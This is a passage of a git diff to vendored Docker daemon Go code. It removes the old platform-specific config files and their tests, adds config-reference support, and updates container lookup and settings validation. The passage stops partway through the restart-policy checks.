-func (config *Config) InstallCommonUnixFlags(flags *pflag.FlagSet) { - config.Runtimes = make(map[string]types.Runtime) - - flags.StringVarP(&config.SocketGroup, "group", "G", "docker", "Group for the unix socket") - flags.StringVar(&config.bridgeConfig.IP, "bip", "", "Specify network bridge IP") - flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge") - flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") - flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address") - flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address") - flags.BoolVar(&config.bridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication") - flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports") - flags.Var(runconfigopts.NewNamedRuntimeOpt("runtimes", &config.Runtimes, stockRuntimeName), "add-runtime", "Register an additional OCI compatible runtime") - flags.StringVar(&config.DefaultRuntime, "default-runtime", stockRuntimeName, "Default OCI runtime for containers") - -} - -// GetRuntime returns the runtime path and arguments for a given -// runtime name -func (config *Config) GetRuntime(name string) *types.Runtime { - config.reloadLock.Lock() - defer config.reloadLock.Unlock() - if rt, ok := config.Runtimes[name]; ok { - return &rt - } - return nil -} - -// GetDefaultRuntimeName returns the current default runtime -func (config *Config) GetDefaultRuntimeName() string { - config.reloadLock.Lock() - rt := config.DefaultRuntime - config.reloadLock.Unlock() - - return rt -} - -// GetAllRuntimes returns a copy of the runtimes map -func (config *Config) GetAllRuntimes() map[string]types.Runtime { - config.reloadLock.Lock() - rts := config.Runtimes - 
config.reloadLock.Unlock() - return rts -} - -// GetExecRoot returns the user configured Exec-root -func (config *Config) GetExecRoot() string { - return config.ExecRoot -} - -// GetInitPath returns the configure docker-init path -func (config *Config) GetInitPath() string { - config.reloadLock.Lock() - defer config.reloadLock.Unlock() - if config.InitPath != "" { - return config.InitPath - } - return DefaultInitBinary -} diff --git a/vendor/github.com/docker/docker/daemon/config_experimental.go b/vendor/github.com/docker/docker/daemon/config_experimental.go deleted file mode 100644 index 963a51e5a3..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_experimental.go +++ /dev/null @@ -1,8 +0,0 @@ -package daemon - -import ( - "github.com/spf13/pflag" -) - -func (config *Config) attachExperimentalFlags(cmd *pflag.FlagSet) { -} diff --git a/vendor/github.com/docker/docker/daemon/config_solaris.go b/vendor/github.com/docker/docker/daemon/config_solaris.go deleted file mode 100644 index bc18ccd7e4..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_solaris.go +++ /dev/null @@ -1,47 +0,0 @@ -package daemon - -import ( - "github.com/spf13/pflag" -) - -var ( - defaultPidFile = "/system/volatile/docker/docker.pid" - defaultGraph = "/var/lib/docker" - defaultExec = "zones" -) - -// Config defines the configuration of a docker daemon. -// These are the configuration settings that you pass -// to the docker daemon when you launch it with say: `docker -d -e lxc` -type Config struct { - CommonConfig - - // These fields are common to all unix platforms. - CommonUnixConfig -} - -// bridgeConfig stores all the bridge driver specific -// configuration. -type bridgeConfig struct { - commonBridgeConfig - - // Fields below here are platform specific. - commonUnixBridgeConfig -} - -// InstallFlags adds command-line options to the top-level flag parser for -// the current process. 
-func (config *Config) InstallFlags(flags *pflag.FlagSet) { - // First handle install flags which are consistent cross-platform - config.InstallCommonFlags(flags) - - // Then install flags common to unix platforms - config.InstallCommonUnixFlags(flags) - - // Then platform-specific install flags - config.attachExperimentalFlags(flags) -} - -func (config *Config) isSwarmCompatible() error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/config_test.go b/vendor/github.com/docker/docker/daemon/config_test.go deleted file mode 100644 index 90f6a1277f..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_test.go +++ /dev/null @@ -1,229 +0,0 @@ -package daemon - -import ( - "io/ioutil" - "os" - "runtime" - "strings" - "testing" - - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/spf13/pflag" -) - -func TestDaemonConfigurationNotFound(t *testing.T) { - _, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker") - if err == nil || !os.IsNotExist(err) { - t.Fatalf("expected does not exist error, got %v", err) - } -} - -func TestDaemonBrokenConfiguration(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - f.Write([]byte(`{"Debug": tru`)) - f.Close() - - _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) - if err == nil { - t.Fatalf("expected error, got %v", err) - } -} - -func TestParseClusterAdvertiseSettings(t *testing.T) { - if runtime.GOOS == "solaris" { - t.Skip("ClusterSettings not supported on Solaris\n") - } - _, err := parseClusterAdvertiseSettings("something", "") - if err != errDiscoveryDisabled { - t.Fatalf("expected discovery disabled error, got %v\n", err) - } - - _, err = parseClusterAdvertiseSettings("", "something") - if err == nil { - t.Fatalf("expected discovery store error, got %v\n", err) - } - - _, err = parseClusterAdvertiseSettings("etcd", "127.0.0.1:8080") - if err 
!= nil { - t.Fatal(err) - } -} - -func TestFindConfigurationConflicts(t *testing.T) { - config := map[string]interface{}{"authorization-plugins": "foobar"} - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - - flags.String("authorization-plugins", "", "") - assert.NilError(t, flags.Set("authorization-plugins", "asdf")) - - assert.Error(t, - findConfigurationConflicts(config, flags), - "authorization-plugins: (from flag: asdf, from file: foobar)") -} - -func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) { - config := map[string]interface{}{"hosts": []string{"qwer"}} - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - - var hosts []string - flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to") - assert.NilError(t, flags.Set("host", "tcp://127.0.0.1:4444")) - assert.NilError(t, flags.Set("host", "unix:///var/run/docker.sock")) - - assert.Error(t, findConfigurationConflicts(config, flags), "hosts") -} - -func TestDaemonConfigurationMergeConflicts(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - f.Write([]byte(`{"debug": true}`)) - f.Close() - - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - flags.Bool("debug", false, "") - flags.Set("debug", "false") - - _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) - if err == nil { - t.Fatal("expected error, got nil") - } - if !strings.Contains(err.Error(), "debug") { - t.Fatalf("expected debug conflict, got %v", err) - } -} - -func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`)) - f.Close() - - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - flags.String("tlscacert", "", "") - flags.Set("tlscacert", 
"~/.docker/ca.pem") - - _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) - if err == nil { - t.Fatal("expected error, got nil") - } - if !strings.Contains(err.Error(), "tlscacert") { - t.Fatalf("expected tlscacert conflict, got %v", err) - } -} - -func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) { - config := map[string]interface{}{"tls-verify": "true"} - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - - flags.Bool("tlsverify", false, "") - err := findConfigurationConflicts(config, flags) - if err == nil { - t.Fatal("expected error, got nil") - } - if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") { - t.Fatalf("expected tls-verify conflict, got %v", err) - } -} - -func TestFindConfigurationConflictsWithMergedValues(t *testing.T) { - var hosts []string - config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"} - flags := pflag.NewFlagSet("base", pflag.ContinueOnError) - flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "") - - err := findConfigurationConflicts(config, flags) - if err != nil { - t.Fatal(err) - } - - flags.Set("host", "unix:///var/run/docker.sock") - err = findConfigurationConflicts(config, flags) - if err == nil { - t.Fatal("expected error, got nil") - } - if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") { - t.Fatalf("expected hosts conflict, got %v", err) - } -} - -func TestValidateConfiguration(t *testing.T) { - c1 := &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"one"}, - }, - } - - err := ValidateConfiguration(c1) - if err == nil { - t.Fatal("expected error, got nil") - } - - c2 := &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"one=two"}, - }, - } - - err = ValidateConfiguration(c2) - if err != nil { - t.Fatalf("expected no error, got error %v", err) - } - - c3 := &Config{ - CommonConfig: CommonConfig{ - DNS: 
[]string{"1.1.1.1"}, - }, - } - - err = ValidateConfiguration(c3) - if err != nil { - t.Fatalf("expected no error, got error %v", err) - } - - c4 := &Config{ - CommonConfig: CommonConfig{ - DNS: []string{"1.1.1.1o"}, - }, - } - - err = ValidateConfiguration(c4) - if err == nil { - t.Fatal("expected error, got nil") - } - - c5 := &Config{ - CommonConfig: CommonConfig{ - DNSSearch: []string{"a.b.c"}, - }, - } - - err = ValidateConfiguration(c5) - if err != nil { - t.Fatalf("expected no error, got error %v", err) - } - - c6 := &Config{ - CommonConfig: CommonConfig{ - DNSSearch: []string{"123456"}, - }, - } - - err = ValidateConfiguration(c6) - if err == nil { - t.Fatal("expected error, got nil") - } -} diff --git a/vendor/github.com/docker/docker/daemon/config_unix.go b/vendor/github.com/docker/docker/daemon/config_unix.go deleted file mode 100644 index d0957884b3..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_unix.go +++ /dev/null @@ -1,104 +0,0 @@ -// +build linux freebsd - -package daemon - -import ( - "fmt" - - runconfigopts "github.com/docker/docker/runconfig/opts" - units "github.com/docker/go-units" - "github.com/spf13/pflag" -) - -var ( - defaultPidFile = "/var/run/docker.pid" - defaultGraph = "/var/lib/docker" - defaultExecRoot = "/var/run/docker" -) - -// Config defines the configuration of a docker daemon. -// It includes json tags to deserialize configuration from a file -// using the same names that the flags in the command line uses. -type Config struct { - CommonConfig - - // These fields are common to all unix platforms. - CommonUnixConfig - - // Fields below here are platform specific. 
- CgroupParent string `json:"cgroup-parent,omitempty"` - EnableSelinuxSupport bool `json:"selinux-enabled,omitempty"` - RemappedRoot string `json:"userns-remap,omitempty"` - Ulimits map[string]*units.Ulimit `json:"default-ulimits,omitempty"` - CPURealtimePeriod int64 `json:"cpu-rt-period,omitempty"` - CPURealtimeRuntime int64 `json:"cpu-rt-runtime,omitempty"` - OOMScoreAdjust int `json:"oom-score-adjust,omitempty"` - Init bool `json:"init,omitempty"` - InitPath string `json:"init-path,omitempty"` - SeccompProfile string `json:"seccomp-profile,omitempty"` -} - -// bridgeConfig stores all the bridge driver specific -// configuration. -type bridgeConfig struct { - commonBridgeConfig - - // These fields are common to all unix platforms. - commonUnixBridgeConfig - - // Fields below here are platform specific. - EnableIPv6 bool `json:"ipv6,omitempty"` - EnableIPTables bool `json:"iptables,omitempty"` - EnableIPForward bool `json:"ip-forward,omitempty"` - EnableIPMasq bool `json:"ip-masq,omitempty"` - EnableUserlandProxy bool `json:"userland-proxy,omitempty"` - UserlandProxyPath string `json:"userland-proxy-path,omitempty"` - FixedCIDRv6 string `json:"fixed-cidr-v6,omitempty"` -} - -// InstallFlags adds flags to the pflag.FlagSet to configure the daemon -func (config *Config) InstallFlags(flags *pflag.FlagSet) { - // First handle install flags which are consistent cross-platform - config.InstallCommonFlags(flags) - - // Then install flags common to unix platforms - config.InstallCommonUnixFlags(flags) - - config.Ulimits = make(map[string]*units.Ulimit) - - // Then platform-specific install flags - flags.BoolVar(&config.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support") - flags.Var(runconfigopts.NewUlimitOpt(&config.Ulimits), "default-ulimit", "Default ulimits for containers") - flags.BoolVar(&config.bridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules") - flags.BoolVar(&config.bridgeConfig.EnableIPForward, "ip-forward", 
true, "Enable net.ipv4.ip_forward") - flags.BoolVar(&config.bridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading") - flags.BoolVar(&config.bridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking") - flags.StringVar(&config.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files") - flags.StringVar(&config.bridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs") - flags.BoolVar(&config.bridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic") - flags.StringVar(&config.bridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary") - flags.BoolVar(&config.EnableCors, "api-enable-cors", false, "Enable CORS headers in the Engine API, this is deprecated by --api-cors-header") - flags.MarkDeprecated("api-enable-cors", "Please use --api-cors-header") - flags.StringVar(&config.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers") - flags.StringVar(&config.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces") - flags.StringVar(&config.ContainerdAddr, "containerd", "", "Path to containerd socket") - flags.BoolVar(&config.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running") - flags.IntVar(&config.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon") - flags.BoolVar(&config.Init, "init", false, "Run an init in the container to forward signals and reap processes") - flags.StringVar(&config.InitPath, "init-path", "", "Path to the docker-init binary") - flags.Int64Var(&config.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") - flags.Int64Var(&config.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") - flags.StringVar(&config.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile") - - config.attachExperimentalFlags(flags) -} - 
-func (config *Config) isSwarmCompatible() error { - if config.ClusterStore != "" || config.ClusterAdvertise != "" { - return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") - } - if config.LiveRestoreEnabled { - return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode") - } - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config_unix_test.go deleted file mode 100644 index 86c16f57ba..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_unix_test.go +++ /dev/null @@ -1,80 +0,0 @@ -// +build !windows - -package daemon - -import ( - "io/ioutil" - "testing" -) - -func TestDaemonConfigurationMerge(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - - f.Write([]byte(` - { - "debug": true, - "default-ulimits": { - "nofile": { - "Name": "nofile", - "Hard": 2048, - "Soft": 1024 - } - }, - "log-opts": { - "tag": "test_tag" - } - }`)) - - f.Close() - - c := &Config{ - CommonConfig: CommonConfig{ - AutoRestart: true, - LogConfig: LogConfig{ - Type: "syslog", - Config: map[string]string{"tag": "test"}, - }, - }, - } - - cc, err := MergeDaemonConfigurations(c, nil, configFile) - if err != nil { - t.Fatal(err) - } - if !cc.Debug { - t.Fatalf("expected %v, got %v\n", true, cc.Debug) - } - if !cc.AutoRestart { - t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart) - } - if cc.LogConfig.Type != "syslog" { - t.Fatalf("expected syslog config, got %q\n", cc.LogConfig) - } - - if configValue, OK := cc.LogConfig.Config["tag"]; !OK { - t.Fatal("expected syslog config attributes, got nil\n") - } else { - if configValue != "test_tag" { - t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue) - } - } - - if cc.Ulimits == nil { - t.Fatal("expected default ulimit config, got nil\n") - } else { - if 
_, OK := cc.Ulimits["nofile"]; OK { - if cc.Ulimits["nofile"].Name != "nofile" || - cc.Ulimits["nofile"].Hard != 2048 || - cc.Ulimits["nofile"].Soft != 1024 { - t.Fatalf("expected default ulimit name, hard and soft are nofile, 2048, 1024, got %s, %d, %d\n", cc.Ulimits["nofile"].Name, cc.Ulimits["nofile"].Hard, cc.Ulimits["nofile"].Soft) - } - } else { - t.Fatal("expected default ulimit name nofile, got nil\n") - } - } -} diff --git a/vendor/github.com/docker/docker/daemon/config_windows.go b/vendor/github.com/docker/docker/daemon/config_windows.go deleted file mode 100644 index df59dcf302..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_windows.go +++ /dev/null @@ -1,71 +0,0 @@ -package daemon - -import ( - "os" - "path/filepath" - - "github.com/docker/docker/api/types" - "github.com/spf13/pflag" -) - -var ( - defaultPidFile string - defaultGraph = filepath.Join(os.Getenv("programdata"), "docker") -) - -// bridgeConfig stores all the bridge driver specific -// configuration. -type bridgeConfig struct { - commonBridgeConfig -} - -// Config defines the configuration of a docker daemon. -// These are the configuration settings that you pass -// to the docker daemon when you launch it with say: `docker daemon -e windows` -type Config struct { - CommonConfig - - // Fields below here are platform specific. (There are none presently - // for the Windows daemon.) -} - -// InstallFlags adds flags to the pflag.FlagSet to configure the daemon -func (config *Config) InstallFlags(flags *pflag.FlagSet) { - // First handle install flags which are consistent cross-platform - config.InstallCommonFlags(flags) - - // Then platform-specific install flags. 
- flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") - flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch") - flags.StringVarP(&config.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe") -} - -// GetRuntime returns the runtime path and arguments for a given -// runtime name -func (config *Config) GetRuntime(name string) *types.Runtime { - return nil -} - -// GetInitPath returns the configure docker-init path -func (config *Config) GetInitPath() string { - return "" -} - -// GetDefaultRuntimeName returns the current default runtime -func (config *Config) GetDefaultRuntimeName() string { - return stockRuntimeName -} - -// GetAllRuntimes returns a copy of the runtimes map -func (config *Config) GetAllRuntimes() map[string]types.Runtime { - return map[string]types.Runtime{} -} - -// GetExecRoot returns the user configured Exec-root -func (config *Config) GetExecRoot() string { - return "" -} - -func (config *Config) isSwarmCompatible() error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config_windows_test.go deleted file mode 100644 index 4a7b95c17d..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_windows_test.go +++ /dev/null @@ -1,59 +0,0 @@ -// +build windows - -package daemon - -import ( - "io/ioutil" - "testing" -) - -func TestDaemonConfigurationMerge(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - - f.Write([]byte(` - { - "debug": true, - "log-opts": { - "tag": "test_tag" - } - }`)) - - f.Close() - - c := &Config{ - CommonConfig: CommonConfig{ - AutoRestart: true, - LogConfig: LogConfig{ - Type: "syslog", - Config: map[string]string{"tag": "test"}, - }, - }, - } - - cc, err := MergeDaemonConfigurations(c, nil, configFile) - if err != nil { - t.Fatal(err) - 
} - if !cc.Debug { - t.Fatalf("expected %v, got %v\n", true, cc.Debug) - } - if !cc.AutoRestart { - t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart) - } - if cc.LogConfig.Type != "syslog" { - t.Fatalf("expected syslog config, got %q\n", cc.LogConfig) - } - - if configValue, OK := cc.LogConfig.Config["tag"]; !OK { - t.Fatal("expected syslog config attributes, got nil\n") - } else { - if configValue != "test_tag" { - t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue) - } - } -} diff --git a/vendor/github.com/docker/docker/daemon/configs.go b/vendor/github.com/docker/docker/daemon/configs.go new file mode 100644 index 0000000000..4fd0d2272c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/configs.go @@ -0,0 +1,21 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/sirupsen/logrus" +) + +// SetContainerConfigReferences sets the container config references needed +func (daemon *Daemon) SetContainerConfigReferences(name string, refs []*swarmtypes.ConfigReference) error { + if !configsSupported() && len(refs) > 0 { + logrus.Warn("configs are not supported on this platform") + return nil + } + + c, err := daemon.GetContainer(name) + if err != nil { + return err + } + c.ConfigReferences = append(c.ConfigReferences, refs...) 
+ return nil +} diff --git a/vendor/github.com/docker/docker/daemon/configs_linux.go b/vendor/github.com/docker/docker/daemon/configs_linux.go new file mode 100644 index 0000000000..ceb666337c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/configs_linux.go @@ -0,0 +1,5 @@ +package daemon // import "github.com/docker/docker/daemon" + +func configsSupported() bool { + return true +} diff --git a/vendor/github.com/docker/docker/daemon/configs_unsupported.go b/vendor/github.com/docker/docker/daemon/configs_unsupported.go new file mode 100644 index 0000000000..ae6f14f54e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/configs_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux,!windows + +package daemon // import "github.com/docker/docker/daemon" + +func configsSupported() bool { + return false +} diff --git a/vendor/github.com/docker/docker/daemon/configs_windows.go b/vendor/github.com/docker/docker/daemon/configs_windows.go new file mode 100644 index 0000000000..ceb666337c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/configs_windows.go @@ -0,0 +1,5 @@ +package daemon // import "github.com/docker/docker/daemon" + +func configsSupported() bool { + return true +} diff --git a/vendor/github.com/docker/docker/daemon/container.go b/vendor/github.com/docker/docker/daemon/container.go index 2a44800098..c8e2053970 100644 --- a/vendor/github.com/docker/docker/daemon/container.go +++ b/vendor/github.com/docker/docker/daemon/container.go @@ -1,22 +1,29 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "os" + "path" "path/filepath" + "runtime" + "strings" "time" - "github.com/docker/docker/api/errors" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/container" "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" + "github.com/docker/docker/opts" 
"github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/system" "github.com/docker/docker/pkg/truncindex" - "github.com/docker/docker/runconfig/opts" + "github.com/docker/docker/runconfig" + volumemounts "github.com/docker/docker/volume/mounts" "github.com/docker/go-connections/nat" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" ) // GetContainer looks for a container using the provided information, which could be @@ -28,7 +35,7 @@ import ( // If none of these searches succeed, an error is returned func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, error) { if len(prefixOrName) == 0 { - return nil, errors.NewBadRequestError(fmt.Errorf("No container name or ID supplied")) + return nil, errors.WithStack(invalidIdentifier(prefixOrName)) } if containerByID := daemon.containers.Get(prefixOrName); containerByID != nil { @@ -46,14 +53,23 @@ func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, e if indexError != nil { // When truncindex defines an error type, use that instead if indexError == truncindex.ErrNotExist { - err := fmt.Errorf("No such container: %s", prefixOrName) - return nil, errors.NewRequestNotFoundError(err) + return nil, containerNotFound(prefixOrName) } - return nil, indexError + return nil, errdefs.System(indexError) } return daemon.containers.Get(containerID), nil } +// checkContainer make sure the specified container validates the specified conditions +func (daemon *Daemon) checkContainer(container *container.Container, conditions ...func(*container.Container) error) error { + for _, condition := range conditions { + if err := condition(container); err != nil { + return err + } + } + return nil +} + // Exists returns a true if a container of the specified ID or name exists, // false otherwise. 
func (daemon *Daemon) Exists(id string) bool { @@ -79,6 +95,9 @@ func (daemon *Daemon) load(id string) (*container.Container, error) { if err := container.FromDisk(); err != nil { return nil, err } + if err := label.ReserveLabel(container.ProcessLabel); err != nil { + return nil, err + } if container.ID != id { return container, fmt.Errorf("Container %s is stored at %s", container.ID, id) @@ -96,13 +115,17 @@ func (daemon *Daemon) Register(c *container.Container) error { c.StreamConfig.NewNopInputPipe() } + // once in the memory store it is visible to other goroutines + // grab a Lock until it has been checkpointed to avoid races + c.Lock() + defer c.Unlock() + daemon.containers.Add(c.ID, c) daemon.idIndex.Add(c.ID) - - return nil + return c.CheckpointTo(daemon.containersReplica) } -func (daemon *Daemon) newContainer(name string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) { +func (daemon *Daemon) newContainer(name string, operatingSystem string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) { var ( id string err error @@ -117,7 +140,7 @@ func (daemon *Daemon) newContainer(name string, config *containertypes.Config, h if config.Hostname == "" { config.Hostname, err = os.Hostname() if err != nil { - return nil, err + return nil, errdefs.System(err) } } } else { @@ -135,8 +158,8 @@ func (daemon *Daemon) newContainer(name string, config *containertypes.Config, h base.ImageID = imgID base.NetworkSettings = &network.Settings{IsAnonymousEndpoint: noExplicitName} base.Name = name - base.Driver = daemon.GraphDriverName() - + base.Driver = daemon.imageService.GraphDriverForOS(operatingSystem) + base.OS = operatingSystem return base, err } @@ -149,7 +172,7 @@ func (daemon *Daemon) GetByName(name string) (*container.Container, error) { if name[0] != '/' { fullName = "/" + name } - id, err := 
daemon.nameIndex.Get(fullName) + id, err := daemon.containersReplica.Snapshot().GetID(fullName) if err != nil { return nil, fmt.Errorf("Could not find entity for %s", name) } @@ -183,7 +206,7 @@ func (daemon *Daemon) generateHostname(id string, config *containertypes.Config) func (daemon *Daemon) setSecurityOptions(container *container.Container, hostConfig *containertypes.HostConfig) error { container.Lock() defer container.Unlock() - return parseSecurityOpt(container, hostConfig) + return daemon.parseSecurityOpt(container, hostConfig) } func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig *containertypes.HostConfig) error { @@ -201,25 +224,31 @@ func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig * return err } - // make sure links is not nil - // this ensures that on the next daemon restart we don't try to migrate from legacy sqlite links - if hostConfig.Links == nil { - hostConfig.Links = []string{} - } - + runconfig.SetDefaultNetModeIfBlank(hostConfig) container.HostConfig = hostConfig - return container.ToDisk() + return container.CheckpointTo(daemon.containersReplica) } // verifyContainerSettings performs validation of the hostconfig and config // structures. -func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { - +func (daemon *Daemon) verifyContainerSettings(platform string, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { // First perform verification of settings common across all platforms. 
if config != nil { if config.WorkingDir != "" { - config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics - if !system.IsAbs(config.WorkingDir) { + wdInvalid := false + if runtime.GOOS == platform { + config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics + if !system.IsAbs(config.WorkingDir) { + wdInvalid = true + } + } else { + // LCOW. Force Unix semantics + config.WorkingDir = strings.Replace(config.WorkingDir, string(os.PathSeparator), "/", -1) + if !path.IsAbs(config.WorkingDir) { + wdInvalid = true + } + } + if wdInvalid { return nil, fmt.Errorf("the working directory '%s' is invalid, it needs to be an absolute path", config.WorkingDir) } } @@ -237,6 +266,25 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon return nil, err } } + + // Validate the healthcheck params of Config + if config.Healthcheck != nil { + if config.Healthcheck.Interval != 0 && config.Healthcheck.Interval < containertypes.MinimumDuration { + return nil, errors.Errorf("Interval in Healthcheck cannot be less than %s", containertypes.MinimumDuration) + } + + if config.Healthcheck.Timeout != 0 && config.Healthcheck.Timeout < containertypes.MinimumDuration { + return nil, errors.Errorf("Timeout in Healthcheck cannot be less than %s", containertypes.MinimumDuration) + } + + if config.Healthcheck.Retries < 0 { + return nil, errors.Errorf("Retries in Healthcheck cannot be negative") + } + + if config.Healthcheck.StartPeriod != 0 && config.Healthcheck.StartPeriod < containertypes.MinimumDuration { + return nil, errors.Errorf("StartPeriod in Healthcheck cannot be less than %s", containertypes.MinimumDuration) + } + } } if hostConfig == nil { @@ -244,18 +292,32 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon } if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { - return nil, fmt.Errorf("can't create 'AutoRemove' container with restart policy") + 
return nil, errors.Errorf("can't create 'AutoRemove' container with restart policy") + } + + // Validate mounts; check if host directories still exist + parser := volumemounts.NewParser(platform) + for _, cfg := range hostConfig.Mounts { + if err := parser.ValidateMountConfig(&cfg); err != nil { + return nil, err + } + } + + for _, extraHost := range hostConfig.ExtraHosts { + if _, err := opts.ValidateExtraHost(extraHost); err != nil { + return nil, err + } } for port := range hostConfig.PortBindings { _, portStr := nat.SplitProtoPort(string(port)) if _, err := nat.ParsePort(portStr); err != nil { - return nil, fmt.Errorf("invalid port specification: %q", portStr) + return nil, errors.Errorf("invalid port specification: %q", portStr) } for _, pb := range hostConfig.PortBindings[port] { _, err := nat.NewPort(nat.SplitProtoPort(pb.HostPort)) if err != nil { - return nil, fmt.Errorf("invalid port specification: %q", pb.HostPort) + return nil, errors.Errorf("invalid port specification: %q", pb.HostPort) } } } @@ -265,18 +327,32 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon switch p.Name { case "always", "unless-stopped", "no": if p.MaximumRetryCount != 0 { - return nil, fmt.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name) + return nil, errors.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name) } case "on-failure": if p.MaximumRetryCount < 0 { - return nil, fmt.Errorf("maximum retry count cannot be negative") + return nil, errors.Errorf("maximum retry count cannot be negative") } case "": - // do nothing + // do nothing default: - return nil, fmt.Errorf("invalid restart policy '%s'", p.Name) + return nil, errors.Errorf("invalid restart policy 